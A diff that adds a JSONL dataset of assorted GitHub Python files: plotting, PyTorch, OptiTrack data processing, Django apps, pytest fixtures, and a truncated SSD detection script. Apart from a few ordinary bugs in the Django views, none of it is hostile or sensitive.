diff --git "a/4034.jsonl" "b/4034.jsonl" new file mode 100644--- /dev/null +++ "b/4034.jsonl" @@ -0,0 +1,1741 @@ +{"seq_id":"7746413376","text":"# -*- coding: utf8 -*-\nfrom phystricks import *\n\ndef plasma(s):\n t=Segment(s.I,s.F)\n t.wave(0.2,0.1)\n t.parameters.color=\"blue\"\n s.parameters.color=\"red\"\n return s,t\n\ndef TOcdZDG():\n pspict,fig = SinglePicture(\"TOcdZDG\")\n pspict.dilatation(1)\n\n A=Point(1,0)\n B=Point(5,0)\n v1=Vector(1,1)\n v2=Vector(-1,3)\n tir1=Segment(A,vector=v1).dilatationF(2)\n tir2=Segment(B,vector=v2)\n\n pspict.DrawGraphs(plasma(tir1),plasma(tir2))\n pspict.DrawDefaultGrid()\n fig.conclude()\n fig.write_the_file()\n","repo_name":"LaurentClaessens/smath","sub_path":"phystricksTOcdZDG.py","file_name":"phystricksTOcdZDG.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"74710923709","text":"import torch\nimport torch.nn as nn\nfrom data.utils import mask\n\n\nclass WordDropout(nn.Module):\n def __init__(self, p, unknown=1, pad=0):\n super(WordDropout, self).__init__()\n self.p = p\n self.unknown = unknown\n self.pad = pad\n\n def forward(self, word_ids, nwords):\n if self.training:\n pad_mask = mask(nwords, device=word_ids.device)\n drop_mask = word_ids.bernoulli(self.p).to(torch.bool)\n\n word_ids = word_ids.masked_fill(drop_mask, self.unknown)\n word_ids = word_ids.masked_fill(pad_mask == 0, self.pad)\n return word_ids\n\n\nclass WordEmbedder(nn.Module):\n def __init__(self, word2idx, embed_dim, w_embeddings=None, freeze=False, word_dropout=0., init_std=0.001):\n super(WordEmbedder, self).__init__()\n\n self.word2idx = word2idx\n self.w_embed_dim = embed_dim\n self.freeze_embeddings = freeze\n self.name = \"word\"\n\n self.word_dropout = word_dropout\n self.word_drop = WordDropout(self.word_dropout)\n\n # layers\n if w_embeddings is None:\n w_embeddings = torch.zeros(len(self.word2idx), self.w_embed_dim)\n w_embeddings.normal_(mean=0.0, std=init_std)\n assert not self.freeze_embeddings\n else:\n assert w_embeddings.size(1) == self.w_embed_dim\n\n self.word_embeddings = nn.Embedding(w_embeddings.size(0), w_embeddings.size(1))\n self.word_embeddings.weight = nn.Parameter(w_embeddings)\n\n if self.freeze_embeddings:\n self.word_embeddings.weight.requires_grad = False\n\n @property\n def device(self):\n return self.word_embeddings.weight.device\n\n def forward(self, data, word_ids_k=\"word_ids\", n_words_k=\"n_words\"):\n # Word embeddings\n embeds = self.word_embeddings(\n self.word_drop(data[word_ids_k].to(self.device, non_blocking=True), data[n_words_k]))\n\n return {\"embeddings\": embeds}\n","repo_name":"btaille/sincere","sub_path":"code/modules/embedders/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"60"} +{"seq_id":"8868444747","text":"#!/user/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n 多进程\n multiprocessing模块就是跨平台版本的多进程模块\n\"\"\"\n\nimport os\n\nprint('Process (%s) start...' % os.getpid())\n# Only works on Unix/Linux/Mac:\npid = os.fork() # 调用一次返回两次 子进程永远返回0\nif pid == 0:\n print('I am 子进程 (%s) and my parent is %s.' %\n (os.getpid(), os.getppid()))\nelse:\n print('I (%s) just created a child process (%s).' % (os.getpid(), pid))\n","repo_name":"tinghaoMa/python","sub_path":"demo/multiprocess/01_fork.py","file_name":"01_fork.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7252327720","text":"\"\"\"Process functions for Optitrack data.\n\nUsage Example 1:\nfrom rofunc.devices.optitrack import get_objects, data_clean\n\ninput_path = \"/path/to/optitrack/data\"\nobjs, meta = get_objects(input_path)\ndata = get_time_series(input_path, meta[0])\n\ntable_pos_x = data.iloc[:, objs[0]['table']['pose']['Position']['X']]\n\nUsage Example 2:\nfrom rofunc.devices.optitrack import get_objects, get_time_series\ndel_objects = ['cup', 'hand_right']\nobjs, meta = get_objects(input_path)\n\n# Remove unused objects from the data\nfor obj in del_objects:\n del objs[obj]\n\ndata, labels = data_clean(input_path, legacy=False, objs=objs)[0]\n\nlabel_idx = labels.index('table.pose.x')\ntable_pos_x = data[label_idx, :]\n\n\"\"\"\nimport os\nimport csv\nimport glob\n\nimport pickle as pkl\nimport pandas as pd\nfrom tqdm import tqdm\nimport numpy as np\nimport rofunc as rf\n\n\ndef get_objects(input_path: str):\n \"\"\"Returns a dictionary of objects from the Optitrack data.\n The Optitack csv must have the original name format (e.g. \"Take 2020-06-03 15-00-00.csv\").\n The returned list does not necessarily have the same order as your file explorer, but the meta ond objects list do.\\\n Check the meta to make sure you work on the correct file.\n\n Args:\n input_path (str): path to the Optitrack data.\\\n If the path is to a folder, all the file with names like \"Take[...].csv\" are read.\n Returns:\n tuple: (objects, meta)\n \"\"\"\n objs_list = list()\n meta_list = list()\n if input_path.endswith('.csv'):\n glob_path = input_path\n else:\n glob_path = os.path.join(input_path, 'Take*.csv')\n demo_csvs = glob.glob(glob_path)\n demo_csvs = sorted(demo_csvs)\n for demo_csv in demo_csvs:\n objs = {}\n demo_path = demo_csv\n with open(demo_path) as f:\n data = csv.reader(f)\n row = next(data)\n meta = dict(zip(row[::2], row[1::2]))\n next(data)\n t = next(data)\n n = next(data)\n id = next(data)\n tr = next(data)\n ax = next(data)\n\n for i, o in enumerate(n):\n o = o.lower()\n if o and o != 'name':\n if o[-7:-1] == 'marker':\n obj = o[:-8]\n m = o[-1]\n if obj not in objs:\n objs[obj] = {'markers': {}}\n if str(m) not in objs[obj]['markers']:\n objs[obj]['markers'][str(m)] = {'pose': {tr[i]: {ax[i]: i}}}\n else:\n if tr[i] not in objs[obj]['markers'][str(m)]['pose']:\n objs[obj]['markers'][str(m)]['pose'][tr[i]] = {}\n objs[obj]['markers'][str(m)]['pose'][tr[i]][ax[i]] = i\n elif not o in objs:\n objs[o] = {\n 'type': t[i],\n 'pose': {tr[i]: {ax[i]: i}},\n 'markers': {},\n 'id': {id[i]}\n }\n else:\n if tr[i] not in objs[o]['pose']:\n objs[o]['pose'][tr[i]] = {}\n objs[o]['pose'][tr[i]][ax[i]] = i\n objs_list.append(objs)\n meta_list.append(meta)\n\n return objs_list, meta_list\n\n\ndef data_clean(input_path: str, legacy: bool = True, objs: dict = None, save: bool = False):\n \"\"\"\n Cleans the Optitrack data.\n Args:\n input_path (str): path to the Optitrack data.\n legacy (:obj:`bool`, optional): if True, it will use the legacy version of the function.\\\n Defaults to True.\n objs (:obj:`dict`, optional): dictionary of objects to keep. If set to None, export all data.\\\n Defaults to None.\n save (:obj:`bool`, optional): if True, it will save the cleaned data to disk.\\\n Defaults to False.\n Returns:\n list: list of cleaned data for all csv in folder. Type of elements in list depend on args.\n \"\"\"\n # TODO: Must work for **file** or folder input path\n out_path = os.path.join(input_path, 'process')\n if save:\n rf.oslab.create_dir(out_path)\n demo_csvs = os.listdir(input_path)\n demo_csvs = sorted(demo_csvs)\n out_list = list()\n for i in range(len(demo_csvs)):\n demo_csv = demo_csvs[i]\n if 'Take' in demo_csv:\n if legacy:\n out_list.append(data_clean_legacy(input_path, demo_csv, out_path))\n else:\n if objs is None:\n out_data = pd.read_csv(os.path.join(input_path, demo_csv), skiprows=6)\n if save:\n out_data.to_csv(os.path.join(out_path, demo_csv))\n out_list.append(out_data)\n else:\n labels = ['frame', 'time']\n out_data = []\n data_raw = pd.read_csv(os.path.join(input_path, demo_csv), skiprows=6)\n out_data.append(data_raw.iloc[:, 0])\n out_data.append(data_raw.iloc[:, 1])\n for obj in objs:\n labels.extend([f\"{obj}.pose.x\", f\"{obj}.pose.y\", f\"{obj}.pose.z\"]),\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Position\"]['X']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Position\"]['Y']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Position\"]['Z']])\n if objs[obj]['type'] == 'Rigid Body':\n labels.extend([f\"{obj}.pose.qx\", f\"{obj}.pose.qy\", f\"{obj}.pose.qz\", f\"{obj}.pose.qw\"])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['X']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['Y']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['Z']])\n out_data.append(data_raw.iloc[:, objs[obj]['pose'][\"Rotation\"]['W']])\n for marker in objs[obj]['markers']:\n labels.extend(\n [f\"{obj}.marker.{marker}.x\", f\"{obj}.marker.{marker}.y\", f\"{obj}.marker.{marker}.z\"])\n out_data.append(data_raw.iloc[:, objs[obj]['markers'][marker]['pose'][\"Position\"]['X']])\n out_data.append(data_raw.iloc[:, objs[obj]['markers'][marker]['pose'][\"Position\"]['Y']])\n out_data.append(data_raw.iloc[:, objs[obj]['markers'][marker]['pose'][\"Position\"]['Z']])\n out_data = np.array(out_data).T\n out_list.append((out_data, labels))\n if save:\n with open(os.path.join(out_path, demo_csv.replace('.csv', '_labels.pkl')), 'wb') as f:\n pkl.dump(labels, f)\n np.save(os.path.join(out_path, demo_csv.replace('csv', 'npy')), out_data)\n\n print('{} finished'.format(input_path.split('/')[-1]))\n return out_list\n\n\ndef data_clean_legacy(input_path: str, demo_csv: str, out_path: str):\n \"\"\"\n Cleans the Optitrack data. legacy version\n Args:\n input_path (str): path to the Optitrack data.\n demo_csv (str): name of the csv file\n out_path (str): path to save the cleaned data for Manus\n\n Returns:\n csv_data (:pandas:`DataFrame`): cleaned data as a pandas dataframe\n \"\"\"\n if 'Manus' in demo_csv:\n demo_path = os.path.join(input_path, demo_csv)\n out_file_path = os.path.join(out_path, demo_csv)\n rf.oslab.delete_lines(demo_path, out_file_path, 14)\n csv_data = pd.read_csv(out_file_path)\n # csv_data = pd.read_csv(demo_path, skiprows=6)\n if '3f6ec26f' in demo_csv:\n csv_data.to_csv(os.path.join(input_path, \"left_manus.csv\"))\n elif '7b28f20b' in demo_csv:\n csv_data.to_csv(os.path.join(input_path, \"right_manus.csv\"))\n else:\n demo_path = os.path.join(input_path, demo_csv)\n # The first 6 rows are headers: https://v22.wiki.optitrack.com/index.php?title=Data_Export:_CSV\n csv_data = pd.read_csv(demo_path, skiprows=6)\n csv_data.to_csv(os.path.join(input_path, \"opti_hands.csv\"))\n\n return csv_data\n\n\ndef data_clean_batch(input_dir: str):\n demos = os.listdir(input_dir)\n demos = sorted(demos)\n for demo in tqdm(demos):\n input_path = os.path.join(input_dir, demo)\n data_clean(input_path)\n\n\ndef export(input_dir: str):\n \"\"\"\n Export rigid body motion data.\n :param input_dir: csv file path\n :return: [number of frames, number of rigid bodies, pose dimension = 7]\n \"\"\"\n csv_data = pd.read_csv(input_dir, skiprows=7, header=None)\n\n type_data = pd.read_csv(input_dir, skiprows=2, nrows=0)\n type_list = list(type_data.columns)\n\n name_data = pd.read_csv(input_dir, skiprows=3, nrows=0)\n name_list = list(name_data.columns)\n\n time_data = pd.read_csv(input_dir, skiprows=6, usecols=['Frame'])\n time_data_list = list(time_data.index)\n\n rigid_body_index_list = []\n for i in range(len(type_list)):\n if (\":Marker\" not in name_list[i]) and (\"Rigid Body\" in type_list[i]):\n rigid_body_index_list.append(i)\n\n num_rigid_body = int(len(rigid_body_index_list) / 7)\n optitrack_data_list = []\n\n for i in time_data_list:\n frame_data = []\n for j in range(num_rigid_body):\n rigid_body_index_start = 7 * j\n rigid_body_index_end = 7 + 7 * j\n frame_data.append(\n list(csv_data.values[i, rigid_body_index_list[rigid_body_index_start:rigid_body_index_end]]))\n optitrack_data_list.append(frame_data)\n return np.array(optitrack_data_list)\n","repo_name":"Skylark0924/Rofunc","sub_path":"rofunc/devices/optitrack/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","stars":218,"dataset":"github-code","pt":"60"} +{"seq_id":"73067826750","text":"#!/usr/bin/env python3\n#-*- coding: UTF-8 -*-\nimport random\nimport collections\nimport copy\nimport numpy as np\n\nimport student\n\nROW_MAX = 6\nCOLUMN_MAX = 7\n\n\nclass SeatTable(object):\n def __init__(self, students, mating_pair=None):\n self.mating_pair = mating_pair\n self.students = students\n\n if self.mating_pair: self.init_by_mating()\n else: self.init_by_random()\n\n self.score = self.calc_score()\n\n\n def init_by_mating(self):\n st_nums = copy.deepcopy(list(self.students.keys()))\n self.table = np.zeros((ROW_MAX, COLUMN_MAX), dtype='int32')\n rows, cols = self.table.shape\n locations = [(r,c) for r in range(rows) for c in range(cols)]\n a = self.mating_pair[0]\n b = self.mating_pair[1]\n\n # copy the same gene(seat location)\n for r, c in locations:\n if a.table[r, c] == b.table[r, c]:\n st_num = a.table[r, c]\n if st_num != 0:\n st_nums.remove(st_num)\n locations.remove((r,c))\n self.table[r,c] = st_num\n\n while st_nums:\n st_num = random.choice(st_nums) # random choice student\n st_nums.remove(st_num)\n loc = random.choice(locations) # random choice location\n locations.remove(loc)\n\n r, c = loc[0], loc[1]\n self.table[r,c] = st_num\n\n self.mutation()\n\n\n def init_by_random(self):\n st_nums = copy.deepcopy(list(self.students.keys()))\n self.table = np.zeros((ROW_MAX, COLUMN_MAX), dtype='int32')\n rows, cols = self.table.shape\n locations = [(r,c) for r in range(rows) for c in range(cols)]\n\n while st_nums:\n st_num = random.choice(st_nums) # random choice student\n st_nums.remove(st_num)\n loc = random.choice(locations) # random choice location\n locations.remove(loc)\n\n r, c = loc[0], loc[1]\n self.table[r,c] = st_num\n\n\n def mutation(self):\n while random.random() < 0.6:\n rows, cols = self.table.shape\n locations = [(r,c) for r in range(rows) for c in range(cols)]\n\n # random selcect 2 locations\n loc1 = random.choice(locations)\n loc2 = loc1\n while loc2 == loc1: \n loc2 = random.choice(locations)\n \n # swap\n r1, c1 = loc1[0], loc1[1]\n r2, c2 = loc2[0], loc2[1]\n tmp = self.table[r1, c1]\n self.table[r1, c1] = self.table[r2, c2]\n self.table[r2, c2] = tmp\n\n\n def calc_score(self):\n hscore = self.height_score()\n return hscore\n\n\n def height_score(self):\n result = 0\n tt = self.table.transpose()\n for col in tt:\n height_score = self.col_height_score(col)\n result += height_score\n return result\n\n\n def col_height_score(self, col):\n result = 0\n for idx, sn in enumerate(col):\n if sn == 0: continue # empty seat\n st = self.students[sn]\n h = st.height\n\n for sn2 in col[:idx]:\n if sn2 == 0: continue # empty seat\n if sn2 != sn:\n front_st = self.students[sn2]\n front_h = front_st.height\n diff = (front_h - h) if front_h > h else 0\n result += diff \n return result\n\n\n def __repr__(self):\n lines = []\n rows, cols = self.table.shape\n for r in range(rows):\n st_infos = []\n for c in range(cols):\n sn = self.table[r, c]\n if sn:\n st = self.students[sn]\n info = '#{:02d},{:03d},{}'.format(st.num, st.height, st.duty)\n st_infos.append(info)\n else:\n st_infos.append('#--,---,-')\n line = ' '.join(st_infos)\n lines.append(line)\n\n line = 'score: {}'.format(self.calc_score())\n lines.append(line)\n\n result = '\\n'.join(lines)\n return result\n\n\n def __str__(self):\n return str(self.table)\n\n\nif __name__ == '__main__':\n students = student.student_factory('config.txt')\n\n for _ in range(3):\n table = SeatTable(students)\n print(table)\n print(repr(table))\n\n\n","repo_name":"handy505/seat_tables","sub_path":"seat.py","file_name":"seat.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44088566240","text":"from django.shortcuts import render, get_object_or_404,redirect\nfrom .models import Comment \nfrom newss.models import News \nfrom cat.models import Cat \nfrom subcat.models import SubCat \nfrom django.contrib.auth import authenticate,login,logout\nfrom django.core.files.storage import FileSystemStorage \nfrom trending.models import Trending \nimport random\nfrom random import randint \nfrom django.contrib.auth.models import User, Group, Permission\nfrom manager.models import Manager \nimport string \nimport datetime \n\n\n# Create your views here.\n\ndef news_cm_add(request,pk):\n if request.method == 'POST':\n now = datetime.datetime.now()#hozirgi vaqtni oladi \n year = now.year #hozirgi vaqtdan faqat yilini olsin\n month = now.month #hozirgi vaqtdan faqat oyni olsin\n day = now.day #hozirgi vaqtdan kunini olsin , seshanba\n\n if len(str(day)) == 1:#agar uzunligi 1 taga teng bo'lsa, 5-kun 0 + 5 05 kun \n day = \"0\"+str(day)\n if len(str(month)) == 1:#uzunligi 1 ga teng bo'lsa \n month = \"0\" + str(month)#01 yanvar 02 fevral \n today = str(year) + \"/\" + str(month)+\"/\" + str(day)#kunini oldi to'liq 2022 12 12\n time = str(now.hour) + \":\" + str(now.minute)#15:15 \n cm = request.POST.get('msg')\n if request.user.is_authenticated:#user logged in \n manager = Manager.objects.get(utxt=request.user)\n b = Comment(name=manager.name,email=manager.email,cm=cm,news_id=pk,date=today,time=tiem)#name = manager.name means will take automatically from loggerd in user(manager) - manager.name managerni ismini ob qo'yishi kerak, qachonki u login qilgan paytda, \n b.save()\n else:#user not logged in \n name = request.POST.get('name')\n email = request.POST.get('email')\n b = Comment(name=name,email=email,cm=cm,news_id=pk,date=today,time=time)\n b.save()\n newsname = News.objects.get(pk=pk).name #ya'ni pk = primary key asosiy kalit, models ni kaliti \n return redirect('news_detail',word=newsname)\n\ndef comments_list(request):\n #login qilish kerak, admin\n if not request.user.is_authenticated:\n return redirect('mylogin')\n perm = 0 \n for i in request.user.groups.all():#foydalanuvchi guruhlari ichida yurilik\n if i.name == \"masteruser\":perm=1 #bu superuser \n if perm == 0:#user superuser emas masteruser\n a = News.objects.get(pk=pk).writer\n if str(a) != str(request.user):#we can use a instead of str(a). it will not give error \n error = \"Access Denied\"\n return render(request,'back/error.html',{'error':error})\n comment = Comment.objects.all()\n return render(request,'back/comments_list.html',{'comment':comment})\n\ndef comments_del(request,pk):\n if not request.user.is_authenticated:\n return redirect('mylogin')\n perm = 0 \n for i in request.user.groups.all():\n if i.name == \"masteruser\":perm = 1 \n if perm == 0:\n a = News.objects.get(pk=pk).writer\n if str(a) != str(request.user):\n error = \"Access Denied\"\n return render(request,'back/error.html',{'error':error})\n comment = Comment.objects.filter(pk=pk)\n comment.delete()\n return redirect('comments_list')\n\ndef comments_confirm(request,pk):\n if not request.user.is_authenticated:\n return redirect('mylogin')\n perm = 0 \n for i in request.user.groups.all():\n if i.name == \"masteruser\":perm = 1 \n if perm == 0:\n a = News.objects.get(pk=pk).writer\n if str(a) != str(request.user):\n error = \"Access Denied\"\n return render(request,'back/error.html',{'error':error})\n comment = Comment.objects.get(pk=pk)\n comment.status = 1 \n comment.save()\n return redirect('comments_list')\n\n\n\n","repo_name":"SDeVPro/news_portal_for_students","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15419148796","text":"from apps.login.models import Acount\nfrom apps.agenda.models import Turn\nfrom apps.agenda.forms import SearchForm\n\ndef valid_acount(request):\n if request.user.is_authenticated:\n try:\n user = Acount.objects.get(user_id=request.user) # Suponiendo que tienes una relación OneToOneField llamada 'acount' en tu modelo User\n except Acount.DoesNotExist:\n return False\n else:\n return False\n return True\n\ndef search_turn(request):\n form = SearchForm(request.GET)\n turns = Turn.objects.all()\n\n if form.is_valid():\n day_of_week = form.cleaned_data['day_of_week']\n date = form.cleaned_data['date']\n\n if day_of_week:\n turns = turns.filter(date__week_day=SearchForm.day_choices.index(day_of_week))\n\n if date:\n turns = turns.filter(date=date)\n\n return turns\n","repo_name":"Stradivariuskein/tercer-pre-entrega-luque","sub_path":"pamela/my_functions.py","file_name":"my_functions.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29526044107","text":"from django.db import models\n#from multiselectfield import MultiSelectField\n\nDOW = (('1', 'Sunday'),\n ('2', 'Monday'),\n ('3', 'Tuesday'),\n ('4', 'Wednesday'),\n ('5', 'Thursday'),\n ('6', 'Friday'),\n ('7', 'Saturday'))\n\nFrequency = (('1', 'Weekly'),\n ('2', 'Monthly'),\n ('3', 'Bi-Weekly'),\n ('4', 'Bi-Monthly'))\n\nclass Course(models.Model):\n course_name = models.CharField(blank=False, null=False, max_length=250)\n course_slug = models.SlugField(unique=True)\n course_description = models.TextField(blank=False, null=False)\n course_start_time = models.TimeField(blank=False, null=False)\n course_end_time = models.TimeField(blank=False, null=False)\n #course_days_of_week = MultiSelectField(choices=DOW)\n course_days_of_week = models.CharField(max_length=1, choices=DOW)\n course_all_day = models.BooleanField(default=False)\n custom_start_date = models.DateField(blank=True, null=True)\n custom_end_date = models.DateField(blank=True, null=True)\n session_id = models.ForeignKey('Session')\n course_private = models.BooleanField(default=False)\n course_spaces = models.IntegerField(default=15)\n course_date_created = models.DateTimeField(blank=True, null=False, auto_now=True)\n course_date_modified = models.DateTimeField(blank=True, null=False, auto_now=True)\n course_instructor = models.ForeignKey('users.User')\n #course_image\n course_price = models.IntegerField(blank=True, null=True)\n location_id = models.ForeignKey('Location')\n course_category_id = models.ForeignKey('Category')\n recurs = models.BooleanField(default=True)\n recurs_interval = models.CharField(max_length=1, choices=Frequency, default=1)\n custom_recurs_times = models.IntegerField(blank=True, null=True)\n #will use the recurs info to build calendar feed\n\n class Meta:\n db_table = 'cm_courses'\n\n def __str__(self):\n return self.course_name\n\nclass CourseImage(models.Model):\n course_image = models.ImageField()\n\n def _str__(self):\n return self.courseimage_id\n\nclass Session(models.Model):\n session_name = models.CharField(blank=False, null=False, max_length=250)\n session_start_date = models.DateField(blank=False, null=False)\n session_end_date = models.DateField(blank=False, null=False)\n\n def __str__(self):\n return self.session_name\n\nclass Location(models.Model):\n location_name = models.CharField(blank=False, null=False, max_length=250)\n location_slug = models.CharField(max_length=100, blank=False, null=False)\n location_address = models.CharField(max_length=200, blank=False, null=False)\n location_address2 = models.CharField(max_length=200, blank=True, null=True)\n location_city = models.CharField(max_length=200, blank=False, null=False)\n location_state = models.CharField(max_length=2, blank=False, null=False)\n location_postcode = models.CharField(max_length=10, blank=False, null=False)\n location_phone = models.CharField(max_length=15, blank=True, null=True)\n #google maps linkage\n #location_country = models.CharField(max_length=2, blank=True, null=True)\n\n class Meta:\n db_table = 'cm_locations'\n\n def __str__(self):\n return self.location_name\n\nclass Category(models.Model):\n category_name = models.CharField(blank=False, null=False, max_length=250)\n category_slug = models.CharField(max_length=100, blank=False, null=False)\n\n class Meta:\n db_table = 'cm_categories'\n verbose_name_plural = \"categories\"\n\n def __str__(self):\n return self.category_name\n\nclass Spot(models.Model):\n #the purchasable thing isn't the course, it's a spot in the course\n course_slug = models.ForeignKey('Course')\n spot_name = models.CharField(max_length=100, blank=False, null=False)\n spot_price = models.DecimalField(max_digits=14, decimal_places=4, blank=True, null=True)\n spot_start = models.DateTimeField(blank=True, null=True) #spots go on sale\n spot_end = models.DateTimeField(blank=True, null=True) #sales end\n spot_quantity = models.IntegerField(blank=False, null=False, default=1)\n\n class Meta:\n db_table = 'cm_spots'\n","repo_name":"mattyarbrough/coursemanager","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40014437423","text":"import os\nimport pickle\nimport torch\n\n\nSPECIAL_WORDS = {'PADDING': ''}\n\n\ndef load_data(path):\n \"\"\"\n Load Dataset from File\n \"\"\"\n input_file = os.path.join(path)\n with open(input_file, \"r\") as f:\n data = f.read()\n\n return data\n\n\ndef preprocess_and_save_data(dataset_path, token_lookup, create_lookup_tables):\n \"\"\"\n Preprocess Text Data\n \"\"\"\n text = load_data(dataset_path)\n \n # Ignore notice, since we don't use it for analysing the data\n text = text[81:]\n\n token_dict = token_lookup()\n for key, token in token_dict.items():\n text = text.replace(key, ' {} '.format(token))\n\n text = text.lower()\n text = text.split()\n\n vocab_to_int, int_to_vocab = create_lookup_tables(text + list(SPECIAL_WORDS.values()))\n int_text = [vocab_to_int[word] for word in text]\n pickle.dump((int_text, vocab_to_int, int_to_vocab, token_dict), open('preprocess.p', 'wb'))\n\n\ndef load_preprocess():\n \"\"\"\n Load the Preprocessed Training data and return them in batches of or less\n \"\"\"\n return pickle.load(open('preprocess.p', mode='rb'))\n\n\ndef save_model(filename, decoder):\n save_filename = os.path.splitext(os.path.basename(filename))[0] + '.pt'\n torch.save(decoder, save_filename)\n\n\ndef load_model(filename):\n save_filename = os.path.splitext(os.path.basename(filename))[0] + '.pt'\n return torch.load(save_filename)\n","repo_name":"udacity/deep-learning-v2-pytorch","sub_path":"project-tv-script-generation/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":5070,"dataset":"github-code","pt":"60"} +{"seq_id":"28114593037","text":"from fastapi.testclient import TestClient\r\nfrom app.app import app\r\nimport pytest\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom app.db.database import get_db,Base\r\nfrom app.db.models.entries_model import Entries\r\nimport os\r\nfrom dotenv import load_dotenv\r\nload_dotenv()\r\n\r\n\r\ndatabase_url_test=os.getenv('database_url_test')\r\n\r\nengine=create_engine(database_url_test)\r\n\r\nTestingSessionLocal=sessionmaker(bind=engine,autocommit=False,autoflush=False,expire_on_commit=False)\r\n\r\n\r\n\r\n@pytest.fixture()\r\ndef session():\r\n TestingSessionLocal.close_all()\r\n Base.metadata.drop_all(bind=engine)\r\n Base.metadata.create_all(bind=engine)\r\n db=TestingSessionLocal()\r\n try:\r\n yield db\r\n except:\r\n db.close()\r\n\r\n\r\n\r\n@pytest.fixture()\r\ndef client(session):\r\n\r\n def override_get_db():\r\n try:\r\n yield session\r\n except:\r\n session.close()\r\n app.dependency_overrides[get_db]=override_get_db \r\n yield TestClient(app)\r\n \r\n\r\n@pytest.fixture\r\ndef new_user(client):\r\n data={\"username\":\"test_user\",\"email\":\"test_user@gmail.com\",\"password\":\"test_user_password\"}\r\n res=client.post('/users/register',json=data)\r\n \r\n new_user= res.json()\r\n new_user['password']=data['password']\r\n \r\n return new_user\r\n\r\n@pytest.fixture\r\ndef authorized_client(new_user,client):\r\n client.headers={\r\n **client.headers,\r\n \"Authorization\":f\"Bearer {new_user['token']['access_token']}\"\r\n }\r\n\r\n return client \r\n\r\n@pytest.fixture\r\ndef test_entries(new_user,session):\r\n entries_data=[\r\n {\r\n 'title':'1st title',\r\n 'body':'1st content',\r\n 'user_id':new_user['id']\r\n },\r\n {\r\n 'title':'2nd title',\r\n 'body':'2nd content',\r\n 'user_id':new_user['id']\r\n },\r\n {\r\n 'title':'3rd title',\r\n 'body':'3rd content',\r\n 'user_id':new_user['id']\r\n },\r\n ]\r\n def create_entries_data(entry):\r\n return Entries(**entry)\r\n\r\n entries_map=map(create_entries_data,entries_data)\r\n entries=list(entries_map)\r\n session.add_all(entries)\r\n session.commit()\r\n data=session.query(Entries).filter(Entries.user_id==new_user['id']).all()\r\n return data\r\n\r\n","repo_name":"vicorandy/python_diary_app","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14364988835","text":"\"\"\"\nThis module provides code to run SSD Object Detection on the given folder\nof images and save the prediction in voc format to results/detection-results.\nTiming information for both code execution and inference time is also \nrecorded to a CSV file \"results/time-results.csv\".\n\ndetection-results can then be passed to the mapscore library to generate a\nmAP score for these detections against the ground truth values for the data.\n\n\nAuthor: David Temple\nDate: 02/03/2020\n\"\"\"\n# OpenCV module installed from https://github.com/opencv/opencv\nimport cv2\n\n# numpy module installed via pip https://numpy.org\nimport numpy as np\n\n# Python standard library modules\nimport argparse\nimport os\nimport csv\nimport shutil\nimport time\n\n#  Command line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"-c\", \"--conf\", default=0.5, type=float, help=\"Set the detection threshold\"\n)\nparser.add_argument(\n \"-d\",\n \"--data\",\n default=\"../test_images/coco_test/images/\",\n help=\"relative path of dataset to use\",\n)\nparser.add_argument(\n \"-s\", \"--samples\", default=None, type=int, help=\"number of images to test on\",\n)\nparser.add_argument(\n \"-g\", \"--gpu\", default=False, type=bool, help=\"boolean to toggle the use of gpu\"\n)\nargs = parser.parse_args()\n\n# Compatible networks\nMODEL = \"MobileNetSSD_V2.pb\"\nINPUT_DIMENSIONS = 300\n\n# Load class labels for relavant file.\n# Based on https://pysource.com/2019/06/27/yolo-object-detection-using-opencv-with-python/\nclasses = []\nwith open(\"coco.names\", \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\n\n# Select dataset\nimages_path = args.data if args.data[-1] == \"/\" else args.data + \"/\"\n# List of all images for testing\nimages_list = os.listdir(images_path)\n# Order images in ascending order if possible\nimages_list = sorted(\n images_list,\n key=lambda x: int(x.replace(\".jpg\", \"\"))\n if x.replace(\".jpg\", \"\").isnumeric()\n else 1,\n)\n\nif args.samples is None or args.samples >= len(images_list):\n print(f\"max number of samples is {len(images_list)}\")\n args.samples = len(images_list)\n\n# Directories for results\ndetection_results = \"results/detection-results\"\ntime_results = \"results/time-results.csv\"\n\n# Remove any exisiting results files to prevent overlap\nif os.path.exists(detection_results):\n shutil.rmtree(detection_results)\nif os.path.exists(time_results):\n os.remove(time_results)\n\nos.makedirs(detection_results)\n\n\ndef add_bb_info(path, line):\n # Store bounding box information for mAP score\n with open(path, \"a\") as file:\n file.write(line + 